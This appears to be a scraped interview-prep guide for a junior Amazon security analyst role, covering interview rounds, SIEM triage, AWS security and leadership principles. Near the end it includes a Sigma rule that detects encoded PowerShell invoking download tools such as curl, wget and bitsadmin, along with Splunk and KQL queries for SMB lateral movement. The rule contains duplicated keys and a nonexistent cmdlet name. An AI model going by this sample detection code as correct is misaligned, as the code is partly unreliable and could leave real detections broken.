Amazon Information Security Analyst (Junior Level) Interview Preparation Guide
Amazon's interview process for junior-level Information Security Analyst roles typically consists of a recruiter screening phase followed by phone technical interviews and onsite interviews. The process emphasizes both technical security knowledge and Amazon's Leadership Principles. Expect scenario-based incident response questions, hands-on SIEM analysis, AWS security fundamentals, and behavioral questions aligned with Amazon's culture. The total process usually spans 4-6 weeks from initial recruiter contact to offer decision.
Interview Rounds
Recruiter Screening
What to Expect
This initial call with a technical recruiter confirms your background, motivation, and technical baseline. The recruiter will discuss your experience with security tools, familiarity with AWS, and interest in the role. They may ask quick technical screeners to verify basic security knowledge. This round is primarily about fit and moving you through the pipeline. For a junior level, the recruiter will focus on verifying your hands-on experience with SIEM tools, knowledge of common security concepts, and ability to articulate your security journey. Be prepared to discuss your current role, specific security projects you've worked on, and why Amazon appeals to you.
Tips & Advice
Be authentic and concise. Have a clear 2-3 minute summary of your security background ready. Mention specific tools you've used (Splunk, QRadar, or others) and concrete security projects. Ask thoughtful questions about the team, their security challenges, and growth opportunities. For junior level, emphasize your eagerness to deepen your security expertise and learn from experienced team members. Research Amazon's security posture and mention any relevant details to show genuine interest. Have your availability clearly stated for phone screens.
Focus Topics
Handling the Unexpected Technical Question
The recruiter may ask a quick technical question like 'What's the difference between a false positive and false negative in security monitoring?' or 'What is a CVSS score?' Have answers ready but don't overcomplicate.
Practice Interview
Study Questions
AWS Security Awareness
Demonstrate basic familiarity with AWS services and security concepts such as IAM, security groups, VPCs, and EC2. You don't need deep expertise yet, but show awareness of cloud security considerations.
Practice Interview
Study Questions
Questions to Ask the Recruiter
Prepare 3-4 thoughtful questions about the team's security focus, current challenges, tools used, and growth path for junior analysts. Avoid questions about salary or benefits at this stage.
Practice Interview
Study Questions
Basic Security Tool Knowledge
Be ready to discuss your experience with any SIEM platforms (Splunk, QRadar, Amazon GuardDuty, Amazon Macie), vulnerability management tools, or intrusion detection systems. Mention specific queries or use cases you've handled.
Practice Interview
Study Questions
Motivation for Information Security and Amazon
Explain why you're interested in security as a career, what aspects of incident response or threat detection excite you, and why you want to work for Amazon specifically. Connect this to Amazon's scale and security requirements.
Practice Interview
Study Questions
Your Security Background and Experience
Articulate your professional journey in security, specific tools you've used (SIEM, vulnerability scanners, IDS/IPS), and key accomplishments. Focus on hands-on experience with security monitoring and incident response.
Practice Interview
Study Questions
Technical Phone Screen 1: SIEM and Incident Response Basics
What to Expect
This 45-60 minute technical phone screen assesses your foundational knowledge of SIEM tools, log analysis, and incident response methodologies. You'll be given a realistic security scenario involving suspicious network activity or a potential breach, and asked to walk through your investigation approach. The interviewer will evaluate your ability to analyze alerts, ask clarifying questions, and follow a systematic process. For a junior level, the expectation is competency in basic SIEM queries, understanding of network protocols (TCP/IP, DNS), and familiarity with incident response frameworks like NIST. You're expected to think through problems logically and ask for help when needed, not to know every answer immediately.
Tips & Advice
Walk through your thought process out loud rather than jumping to conclusions. When presented with a SIEM alert, systematically identify: source IP, destination IP, port, protocol, data volume, and time pattern. Ask clarifying questions ('What is the baseline activity for this user?' 'Are there any known threat indicators?'). For a junior level, it's perfectly acceptable to say 'I haven't seen that specific tool, but here's how I'd approach it' and describe your methodology. Practice explaining technical concepts in simple terms—you'll need to communicate with non-technical stakeholders. Reference frameworks like NIST incident response (Prepare, Detect, Contain, Eradicate, Recover) even if you don't use the exact names. If you hit a knowledge gap, stay calm and discuss how you'd research the answer.
Focus Topics
Log Analysis and Query Construction
Ability to construct basic SIEM queries (Splunk, QRadar, or similar) to investigate hypotheses. Understanding of filtering by time, source, destination, user, process, and combining conditions. Practice articulating queries even if you haven't used the specific tool.
Practice Interview
Study Questions
Phishing and Endpoint Incident Response Scenarios
Walk through a phishing incident scenario from email alert through containment and remediation: identifying malicious attachments, blocking sender domains, checking for user compromise, resetting credentials, documenting findings.
Practice Interview
Study Questions
Common Attack Vectors and Indicators of Compromise (IOCs)
Recognition of common attack patterns: phishing, malware command-and-control (C2) beaconing, DNS tunneling, lateral movement, data exfiltration. Understanding what IOCs to look for: suspicious domains, known malicious IPs, unusual port combinations.
Practice Interview
Study Questions
SIEM Alert Triage and Investigation Methodology
Systematic approach to investigating a SIEM alert: identify source and destination IPs, ports, protocols, baseline comparison, check for lateral movement, correlate with endpoint data, cross-reference threat intelligence, and document findings in a timeline.
Practice Interview
Study Questions
NIST Incident Response Framework
Familiarize with the NIST Cybersecurity Framework phases: Prepare, Detect, Contain, Eradicate, Recover. Be able to map incident response actions to each phase. Understand containment strategies (blocking IPs, disabling accounts) and remediation steps.
Practice Interview
Study Questions
TCP/IP Networking Fundamentals for Security
Understanding of TCP/IP stack, common protocols (HTTP, HTTPS, DNS, FTP), ports (80, 443, 22, 53), and what suspicious network behavior looks like. Ability to read and interpret basic network logs.
Practice Interview
Study Questions
Technical Phone Screen 2: AWS Security and Vulnerability Management
What to Expect
This 45-60 minute technical phone screen focuses on cloud security concepts, AWS services, and vulnerability management. You'll be asked about AWS security architecture, the shared responsibility model, IAM configurations, and how to identify and prioritize security vulnerabilities. Questions may include scenario-based discussions like 'How would you investigate an excessive API call pattern in CloudTrail?' or 'What security concerns would you have with this IAM policy?' For a junior level, expect foundational AWS knowledge and ability to reason through security implications. You're not expected to be an AWS expert, but understanding core security concepts like identity and access management, network isolation, and encryption is important.
Tips & Advice
Familiarize yourself with AWS documentation on the shared responsibility model. Understand the difference between what AWS secures ('of' the cloud: infrastructure, hypervisor) versus what you secure ('in' the cloud: IAM, application security, data encryption). When reviewing IAM policies or security configurations, ask yourself: 'Is this following least-privilege principles? Are there overly broad permissions? What's the business justification?' For a junior level, it's acceptable to not know AWS deeply—focus on explaining your security reasoning and how you'd approach learning AWS-specific tools. Practice articulating vulnerability prioritization using frameworks like CVSS or risk-based prioritization. Reference AWS services where relevant (GuardDuty, Macie, Systems Manager), but don't claim expertise if you haven't used them.
Focus Topics
Container and Application Security in AWS
Basic understanding of container security concerns (image vulnerabilities, privilege escalation, runtime threats), secrets management (AWS Secrets Manager vs. hardcoding credentials), and data encryption at rest and in transit.
Practice Interview
Study Questions
AWS CloudTrail and Logging for Security
Understanding of CloudTrail logs for audit and compliance, recognizing suspicious API activity, and using logs for incident investigation. Familiarity with CloudWatch and basic log analysis.
Practice Interview
Study Questions
Vulnerability Assessment and Prioritization
Understanding of vulnerability management lifecycle: discovery, assessment, prioritization, remediation, and verification. Familiarity with CVSS scores, risk-based prioritization, and how to communicate risk to stakeholders.
Practice Interview
Study Questions
Network Security in AWS: VPCs, Security Groups, and Network Policies
Understanding VPC architecture, security groups as firewalls, network ACLs, and how to segment traffic for security. Ability to identify overly permissive security group rules.
Practice Interview
Study Questions
AWS Shared Responsibility Model
Clear understanding of what AWS manages (infrastructure, physical security, hypervisor, networking hardware) versus customer responsibilities (IAM, data encryption, application security, OS patching, security groups). Ability to apply this model to specific scenarios.
Practice Interview
Study Questions
AWS IAM Best Practices and Policy Analysis
Understanding of IAM roles, policies, least-privilege principles, MFA, and service accounts. Ability to identify overly permissive policies or security risks in IAM configurations. Familiarity with concepts like root account protection and credential rotation.
Practice Interview
Study Questions
Onsite Round 1: Security Operations and SIEM Deep Dive
What to Expect
This 60-minute onsite technical interview dives deeper into your hands-on experience with SIEM tools and daily security operations work. You'll likely be presented with a realistic SIEM dashboard showing multiple alerts and asked to triage, investigate, and make decisions about which incidents to escalate. The interviewer may ask you to walk through a past incident you've handled, explaining your methodology, tools used, decisions made, and outcomes. Expect questions about your experience with specific SIEM platforms, how you handle false positives, and how you communicate findings to the security team. For a junior level, the focus is on demonstrating competency with core tools and showing that you can work through ambiguity when faced with incomplete information.
Tips & Advice
Prepare 2-3 specific incident investigation examples from your current or previous role. Use the STAR format but emphasize the technical details: what tools did you use, what did the logs show, how did you determine it was or wasn't malicious, what was the impact, what did you learn? Be honest about limitations—'We didn't catch that because our detection rules didn't cover that technique' is better than making excuses. If asked about a tool you haven't used, say 'I've used [similar tool], here's how I'd approach learning [new tool].' Practice explaining why certain alerts are high priority versus low priority. Show that you understand the cost of false positives (alert fatigue, burnout, missing real incidents) and false negatives (missing actual attacks). For a junior level, it's expected that you'll ask questions when you encounter something unfamiliar.
Focus Topics
Communication of Security Findings and Risk
Ability to explain technical security findings clearly to non-technical stakeholders. Translating CVSS scores, attack techniques, and remediation steps into business language.
Practice Interview
Study Questions
Hands-On Problem Solving: Analyzing Suspicious Activity
Given a set of logs or a simulated SIEM dashboard, investigate the activity step-by-step, ask clarifying questions, form hypotheses, and explain your conclusions. Show your reasoning process even if you don't reach a definitive answer.
Practice Interview
Study Questions
Alert Triage, False Positive Management, and Tuning
Strategies for identifying false positives, tuning detection rules to reduce noise while maintaining coverage, and balancing alert volume with investigation capability. Understanding the cost of alert fatigue.
Practice Interview
Study Questions
Correlation and Enrichment: Connecting the Dots
Ability to correlate multiple data sources (SIEM, endpoint telemetry, threat intelligence, DNS logs) to build a complete picture of an incident. Understanding how to enrich alerts with context.
Practice Interview
Study Questions
SIEM Tool Hands-On Experience (Splunk, QRadar, or equivalent)
Practical experience with at least one major SIEM platform including alert configuration, query construction, dashboard creation, and investigation workflows. Ability to demonstrate proficiency even if interviewer uses different tool.
Practice Interview
Study Questions
Real Incident Investigation Case Study
Detailed walkthrough of a specific security incident you investigated: initial alert, investigation steps, findings, decisions made, containment/remediation actions, and outcome. Quantify impact when possible.
Practice Interview
Study Questions
Onsite Round 2: Security Frameworks, Compliance, and Threat Intelligence
What to Expect
This 60-minute onsite interview evaluates your understanding of security frameworks, compliance requirements, and threat intelligence. You'll discuss frameworks like MITRE ATT&CK, NIST Cybersecurity Framework, and OWASP Top 10, and how they apply to security operations. Questions may include: 'How would you map a detected attack technique to MITRE ATT&CK and use that for detection improvement?' or 'What compliance requirements are relevant to protecting customer data?' For a junior level, the expectation is familiarity with these frameworks and ability to apply them to real scenarios, not memorizing every detail. The interviewer is also assessing whether you understand the 'why' behind security controls and frameworks, not just following procedures.
Tips & Advice
Study the MITRE ATT&CK framework and pick 3-5 techniques relevant to your company or industry; be ready to discuss detection strategies for those. For NIST CSF, understand the 5 functions (Identify, Protect, Detect, Respond, Recover) and be able to map a business scenario to these. Review the current OWASP Top 10 and have examples of each vulnerability. When discussing compliance, focus on the practical implications: 'PCI DSS requires encryption of cardholder data because...' rather than just listing requirements. For a junior level, it's perfectly fine to say 'I'm less familiar with that specific framework, but here's how I'd approach learning it.' Prepare examples of how security controls map to business objectives.
Focus Topics
Detection Engineering and Coverage Gaps
Ability to evaluate whether your detection rules cover important attack techniques, identify gaps, and think through how to close them. Understanding the trade-off between detection coverage and false positive rates.
Practice Interview
Study Questions
OWASP Top 10 and Application Security
Familiarity with common web application vulnerabilities (injection, broken authentication, sensitive data exposure, XXE, broken access control, etc.), their impact, and how to identify and prevent them.
Practice Interview
Study Questions
Compliance Requirements and Security Operations Impact
Basic awareness of compliance frameworks (SOC 2, GDPR, HIPAA, PCI DSS) and how they drive security monitoring, data protection, and incident response requirements. Understanding why these requirements exist.
Practice Interview
Study Questions
Threat Intelligence Fundamentals and Indicators
Understanding types of threat intelligence (tactical IOCs like IPs/domains, strategic intelligence about threat actors), how to integrate threat intel into security operations, and how to evaluate source credibility.
Practice Interview
Study Questions
NIST Cybersecurity Framework (CSF) for Operations
Understanding the 5 functions (Identify, Protect, Detect, Respond, Recover) and how security operations work across each function. Ability to map security activities to the framework.
Practice Interview
Study Questions
MITRE ATT&CK Framework Application
Understanding the MITRE ATT&CK matrix structure (tactics and techniques), ability to identify attack techniques in incident investigations, and knowledge of how to use ATT&CK for detection engineering and gap analysis.
Practice Interview
Study Questions
Onsite Round 3: Behavioral - Amazon Leadership Principles and Teamwork
What to Expect
This 45-60 minute onsite behavioral interview evaluates how you align with Amazon's Leadership Principles and how you work as a team member. You'll be asked behavioral questions focusing on examples of how you've demonstrated principles like 'Bias for Action,' 'Deliver Results,' 'Customer Obsession,' 'Learn and Be Curious,' and 'Think Big.' The interviewer uses the STAR method to evaluate your answers. For a junior-level role, emphasis is on demonstrating willingness to take initiative, ability to learn quickly, collaborative approach to security challenges, and how you handle ambiguity or failure. The interviewer is assessing your growth potential and cultural fit, not expecting you to be a seasoned leader.
Tips & Advice
Research Amazon's Leadership Principles and pick 2-3 that resonate most with your experience. Prepare specific STAR examples (Situation, Task, Action, Result) for each. For 'Bias for Action,' share a time you made a security decision quickly with incomplete information and adjusted as you learned more. For 'Learn and Be Curious,' discuss learning a new security tool or framework. For 'Deliver Results,' give an example of identifying and fixing a security issue that had real impact. Avoid generic answers; specific, detailed examples with numbers are more convincing. For a junior level, it's acceptable to show you learned from mistakes—'I made a false escalation, but here's what I learned'—because learning agility is valued. Prepare 5-6 strong stories and be ready to adapt them to different principles. Show that you're not just technically competent but also someone who cares about your team and Amazon's mission.
Focus Topics
Learning from Failure and Continuous Improvement
Examples of security incidents or projects that didn't go perfectly, what you learned, and how you improved. Ability to discuss mistakes without defensiveness.
Practice Interview
Study Questions
Amazon Leadership Principle: Learn and Be Curious
Proactively learning new security tools, frameworks, or attack techniques. Examples of how you've developed security knowledge, taken on new responsibilities, or mentored others.
Practice Interview
Study Questions
Amazon Leadership Principle: Customer Obsession
Thinking about how security impacts Amazon's customers and services. Examples of considering customer data protection, confidentiality, or service availability in your security work.
Practice Interview
Study Questions
Collaboration and Teamwork in Security
Examples of working effectively with other security team members, collaborating across teams (DevOps, Engineering), and helping junior colleagues. Ability to communicate security findings constructively.
Practice Interview
Study Questions
Amazon Leadership Principle: Bias for Action
Ability to make decisions and take action even with incomplete information, act quickly to address security threats, and adjust course based on new data. Example: Responding to a security alert before all analysis is complete.
Practice Interview
Study Questions
Amazon Leadership Principle: Deliver Results
Commitment to delivering on security improvements, meeting deadlines for vulnerability remediation, and taking ownership of your work. Examples of security projects or improvements you've owned.
Practice Interview
Study Questions
Onsite Round 4: Incident Response Deep Dive and Security Decision-Making
What to Expect
This 60-minute onsite technical interview focuses on comprehensive incident response scenarios and your ability to make security decisions under pressure. You'll be presented with complex incident scenarios (e.g., 'A user's account shows suspicious access from an unfamiliar location, and they're accessing sensitive data') and asked to walk through your complete response: initial assessment, investigation steps, containment decisions, stakeholder communication, and post-incident improvements. The interviewer probes your decision-making: 'Why did you choose to contain immediately rather than investigate further?' or 'How would you balance security with business continuity?' This round tests both technical knowledge and judgment. For junior level, the focus is on showing sound reasoning and following established incident response procedures, not on making perfect decisions without guidance.
Tips & Advice
When presented with an incident scenario, break it down methodically: (1) Clarify the facts—ask questions about what you observe, baselines, and affected systems; (2) Assess severity using a framework (CVSS, risk-based, or business impact); (3) Develop a hypothesis about what happened; (4) Outline investigation steps to test your hypothesis; (5) Describe containment actions (proportional to severity); (6) Discuss remediation and how to prevent recurrence. Be prepared to explain trade-offs—'Immediately terminating the session might prevent data loss, but investigation would be harder' or 'Blocking the IP prevents future attacks but might impact legitimate services.' For a junior level, it's acceptable to say 'I'd escalate to my senior analyst or incident commander for this decision' when appropriate, but show you're thinking through the decision criteria. Practice describing incident response using NIST terminology (Detect, Contain, Eradicate, Recover). Show that you document incidents thoroughly and consider compliance implications (evidence preservation, notification requirements).
Focus Topics
Compliance and Legal Considerations in Incident Response
Understanding of notification requirements (GDPR, state breach laws, contractual obligations), evidence preservation, chain of custody, and communication with legal/compliance teams.
Practice Interview
Study Questions
Post-Incident Analysis and Lessons Learned
Conducting root cause analysis, documenting incident timeline, identifying process improvements and new detection rules, communicating lessons learned to the team. Understanding how to prevent similar incidents.
Practice Interview
Study Questions
Incident Response Scenarios: Phishing and Credential Compromise
Detailed walkthrough of phishing incident response including email investigation, user education, credential reset, lateral movement checking, and detection rule updates.
Practice Interview
Study Questions
Incident Response Scenarios: Suspicious Data Access and Exfiltration
Investigating unusual data access patterns, determining if data was exfiltrated, containing the threat, notifying affected users/regulators, and preventing recurrence.
Practice Interview
Study Questions
Incident Response Decision-Making Framework
Ability to assess incident severity, determine appropriate response level (alert vs. incident vs. major incident), and make containment/remediation decisions. Understanding trade-offs between investigation depth and response speed.
Practice Interview
Study Questions
Containment Strategies for Different Threat Types
Knowledge of containment approaches for common incidents: compromised credentials (reset, monitor), malware (isolate, scan), unauthorized access (block, revoke), data exfiltration (block egress, monitor data flow). Understanding escalation and when to involve other teams.
Practice Interview
Study Questions
Onsite Round 5: Technical Leadership and Security Program Thinking
What to Expect
This final 60-minute onsite interview evaluates your ability to think beyond individual incidents to broader security program considerations. You'll discuss topics like vulnerability management prioritization, building detection coverage, security tool evaluation, and communicating security initiatives to leadership. Questions might include: 'How would you approach building a vulnerability management program from scratch?' or 'Our detection rules flag 1,000 alerts per day but we can only investigate 50—how do we improve?' These questions assess whether you're developing strategic thinking and can contribute to security program improvements. For a junior level, the focus is on showing awareness of these broader challenges, asking intelligent questions, and demonstrating your willingness to contribute to program improvements, not on having solved these problems before.
Tips & Advice
Approach these questions by breaking down complex security challenges: (1) Understand the business context (what's Amazon trying to protect?); (2) Identify constraints (budget, team size, tool limitations); (3) Propose a phased approach (not everything at once); (4) Focus on high-impact improvements first; (5) Explain how you'd measure success. For example, on vulnerability management: 'We'd start by discovering all assets, assessing vulnerabilities with CVSS, prioritizing by risk to critical assets, and creating a remediation timeline.' For alert volume: 'We'd analyze which alerts are high-value vs. noise, tune detection rules, correlate alerts to reduce duplication, and build better baseline models.' For a junior level, it's expected that you'll ask clarifying questions ('What's our current tooling?', 'How many analysts do we have?') and acknowledge that you'd involve senior colleagues in final decisions. Show enthusiasm for security program improvements and demonstrate you're thinking about scalability and efficiency.
Focus Topics
Onsite Round 5: Technical Leadership and Security Program Thinking
This final 60-minute onsite interview evaluates your ability to think beyond individual incidents to broader security program considerations. You'll discuss topics like vulnerability management prioritization, building detection coverage, security tool evaluation, and communicating security initiatives to leadership. Questions might include: 'How would you approach building a vulnerability management program from scratch?' or 'Our detection rules flag 1,000 alerts per day but we can only investigate 50—how do we improve?' These questions assess whether you're developing strategic thinking and can contribute to security program improvements. For a junior level, the focus is on showing awareness of these broader challenges, asking intelligent questions, and demonstrating your willingness to contribute to program improvements, not on having solved these problems before.
Practice Interview
Study Questions
Hiring Manager Round: Role Expectations and Team Fit
What to Expect
This final 45-60 minute conversation is typically with your direct manager or team lead. The primary goals are to assess your understanding of the role, your expectations, and mutual fit. The hiring manager will discuss day-to-day responsibilities, team dynamics, growth opportunities, and your motivation for the role. This is also your opportunity to ask detailed questions about the team, security challenges, tooling, and career development. The interviewer is assessing: Do you understand what the job entails? Are you genuinely excited about it? Will you work well with the team? For junior level, the emphasis is on learning potential, eagerness to contribute, and compatibility with team culture. The hiring manager is also starting to think about how to mentor you and what your first 90 days would look like.
Tips & Advice
Prepare thoughtful questions about the team's security priorities, current incidents or challenges, how success is measured for this role, and what the first 90 days look like. Show genuine interest in the team's work and ask about mentoring/growth opportunities. Be honest about your skill level and express eagerness to learn from experienced team members. Listen carefully to how the hiring manager describes team dynamics—this is often where you learn whether it's a collaborative, supportive environment. For a junior role, emphasizing that you're looking to build expertise and contribute to the team's security posture resonates well. Ask about on-call expectations, incident response procedures, and typical week-to-week work. This is your best opportunity to ensure you're making a good decision about joining the team, so ask clarifying questions about anything important to you.
Focus Topics
Hiring Manager Round: Role Expectations and Team Fit
This final 45-60 minute conversation is typically with your direct manager or team lead. The primary goals are to assess your understanding of the role, your expectations, and mutual fit. The hiring manager will discuss day-to-day responsibilities, team dynamics, growth opportunities, and your motivation for the role. This is also your opportunity to ask detailed questions about the team, security challenges, tooling, and career development. The interviewer is assessing: Do you understand what the job entails? Are you genuinely excited about it? Will you work well with the team? For junior level, the emphasis is on learning potential, eagerness to contribute, and compatibility with team culture. The hiring manager is also starting to think about how to mentor you and what your first 90 days would look like.
Practice Interview
Study Questions
Frequently Asked Information Security Analyst Interview Questions
Sample Answer
Sample Answer
Sample Answer
Sample Answer
Sample Answer
Sample Answer
title: Detect PowerShell EncodedCommand with Download Utilities
id: f3b8d9a2-xxxx-xxxx-xxxx-xxxxxxxxxxxx
status: experimental
description: Detects PowerShell using -EncodedCommand or long base64-like tokens that reference download utilities such as bitsadmin, wget, curl, or Invoke-WebRequest. Reduces false positives by requiring long encoded content and excluding common management parent processes.
author: InfoSec Analyst
level: high
references: []
tags:
- attack.execution
- attack.t1106
- powershell
logsource:
product: windows
service: sysmon
definition: 'ProcessCreate (EventID 1) or PowerShell commandline logging'
detection:
selection_encoded:
Image|endswith: '\powershell.exe'
CommandLine|contains: '-EncodedCommand'
CommandLine|regex: '[A-Za-z0-9+/]{100,}={0,2}' # long base64-like token
selection_plainbase64:
Image|endswith: '\powershell.exe'
CommandLine|regex: '[A-Za-z0-9+/]{100,}={0,2}'
CommandLine|regex: '(?i)\b(bitsadmin|wget|curl|Invoke-WebRequest|Invoke-WebClient)\b'
exclude_parents:
ParentImage|contains:
- '\ccmexec.exe' # SCCM
- '\scom.exe' # common management
- '\enterprise_mgmt_tool.exe'
condition: (selection_encoded or selection_plainbase64) and not exclude_parents
fields:
- Image
- CommandLine
- ParentImage
- User
- Hostname
falsepositives:
- Large internal automation scripts that legitimately use encoded payloads; tune by adding known parent process or user exclusions.
level: highSample Answer
Sample Answer
Sample Answer
index=winevent OR index=sysmon (EventCode=4624) Logon_Type IN (3,10)
| eval src_ip=coalesce(Source_Network_Address, IpAddress)
| rename ComputerName as host, SubjectUserName as user, _time as auth_time
| table host user src_ip auth_time Logon_Type
| join type=left host [ search index=sysmon EventID=3 DestinationPort=445 OR index=winevent (EventID=5156 OR EventID=5158) DestinationPort=445
| eval dst_ip=DestinationIp, dst_port=DestinationPort
| table host dst_ip dst_port _time Image ]
| where _time >= auth_time AND _time <= auth_time + 600
| where dst_ip!=host
| stats earliest(auth_time) as first_auth, earliest(_time) as first_smb by host user src_ip dst_ip Imagelet auth = SecurityEvent
| where EventID == 4624 and LogonType in (3,10)
| extend src_ip = tostring(IpAddress), host = Computer, user = Account;
let smb = Syslog // or CommonSecurityLog / SecurityEvent with ports
| where DestinationPort == 445 or (Protocol == "TCP" and DestinationPort == 445)
| extend dst_ip = tostring(DestinationIp), host = tostring(Computer), conn_time = TimeGenerated;
auth
| project auth_time = TimeGenerated, host, user, src_ip
| join kind=inner (smb | project conn_time, host, dst_ip, ProcessName) on host
| where conn_time between (auth_time .. auth_time + 10m) and dst_ip != host
| summarize first_auth = min(auth_time), first_smb = min(conn_time) by host, user, src_ip, dst_ip, ProcessNameSample Answer
Want to create your own tailored preparation guide using our deep research?
Get Started for FreeInterview-Ready Courses
Visual-first, interactive, structured learning paths
Browse Information Security Analyst jobs
AI-enriched listings across hundreds of company career pages
Explore Jobs